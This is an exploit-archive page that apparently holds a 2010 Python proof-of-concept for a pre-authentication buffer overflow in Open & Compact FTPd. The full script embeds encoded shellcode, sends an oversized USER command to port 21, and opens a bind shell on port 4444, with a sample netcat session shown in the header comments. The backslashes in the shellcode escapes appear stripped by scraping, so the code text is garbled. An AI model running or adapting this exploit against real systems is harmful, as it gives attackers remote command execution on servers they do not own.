[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Open & Compact FTPd Pre-Authentication Remote Exploit
# Published : 2010-02-12
# Author : Lincoln
# Previous Title : Easy~Ftp Server v1.7.0.2 Post-Authentication BoF
# Next Title : Hyleos ChemView v1.9.5.1 ActiveX Control Buffer Overflow Exploit (meta)
################################################################
#Title: Open & Compact FTPd Pre-Authentication Remote Exploit
#
#Written by: Lincoln
#Originally discovered by: loneferret
#Reference:
#http://www.exploit-db.com/exploits/11391
#Tested on: XPSP2
#root@box:~# ./ftpd.py 192.168.139.130
#
#Try connecting to host on port 4444
#
#root@box:~# nc -vn 192.168.139.130 4444
#(UNKNOWN) [192.168.139.130] 4444 (?) open
#Microsoft Windows XP [Version 5.1.2600]
#(C) Copyright 1985-2001 Microsoft Corp.
#
#C:Documents and SettingscrapDesktopRelease>
#################################################################
import socket,sys
host = sys.argv[1]
#[*] x86/shikata_ga_nai succeeded with size 369 (iteration=1)
sc = ("x31xc9xbdxddx2bx25x18xb1x56xdbxcbxd9x74x24xf4"
"x58x31x68x10x83xe8xfcx03x68x0cx3fxdexd9xf0x36"
"x21x22x01x28xabxc7x30x7axcfx8cx61x4ax9bxc1x89"
"x21xc9xf1x1ax47xc6xf6xabxedx30x38x2bxc0xfcx96"
"xefx43x81xe4x23xa3xb8x26x36xa2xfdx5bxb9xf6x56"
"x17x68xe6xd3x65xb1x07x34xe2x89x7fx31x35x7dx35"
"x38x66x2ex42x72x9ex44x0cxa3x9fx89x4fx9fxd6xa6"
"xbbx6bxe9x6exf2x94xdbx4ex58xabxd3x42xa1xebxd4"
"xbcxd4x07x27x40xeexd3x55x9ex7bxc6xfex55xdbx22"
"xfexbaxbdxa1x0cx76xcaxeex10x89x1fx85x2dx02x9e"
"x4axa4x50x84x4execx03xa5xd7x48xe5xdax08x34x5a"
"x7ex42xd7x8fxf8x09xb0x7cx36xb2x40xebx41xc1x72"
"xb4xf9x4dx3fx3dx27x89x40x14x9fx05xbfx97xdfx0c"
"x04xc3x8fx26xadx6cx44xb7x52xb9xcaxe7xfcx12xaa"
"x57xbdxc2x42xb2x32x3cx72xbdx98x4bxb5x73xf8x1f"
"x51x76xfex8exfdxffx18xdaxedxa9xb3x73xcfx8dx0b"
"xe3x30xe4x27xbcxa6xb0x21x7axc9x40x64x28x66xe8"
"xefxbbx64x2dx11xbcxa1x05x58x84x21xdfx34x46xd0"
"xe0x1cx30x71x72xfbxc1xfcx6fx54x95xa9x5exadx73"
"x47xf8x07x66x9ax9cx60x22x40x5dx6exaax05xd9x54"
"xbcxd3xe2xd0xe8x8bxb4x8ex46x6dx6fx61x31x27xdc"
"x2bxd5xbex2execxa3xbfx7ax9ax4cx71xd3xdbx73xbd"
"xb3xebx0cxa0x23x13xc7x61x53x5ex4axc3xfcx07x1e"
"x56x61xb8xf4x94x9cx3bxfdx64x5bx23x74x61x27xe3"
"x64x1bx38x86x8ax88x39x83x81")
buf = "x42x2cx20" * 199 + "x90" * 10 + sc
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, 21))
s.recv(1024)
s.send("USER " + buf + "rn")
s.recv(1024)
print "nTry connecting to host on port 4444n"
s.close()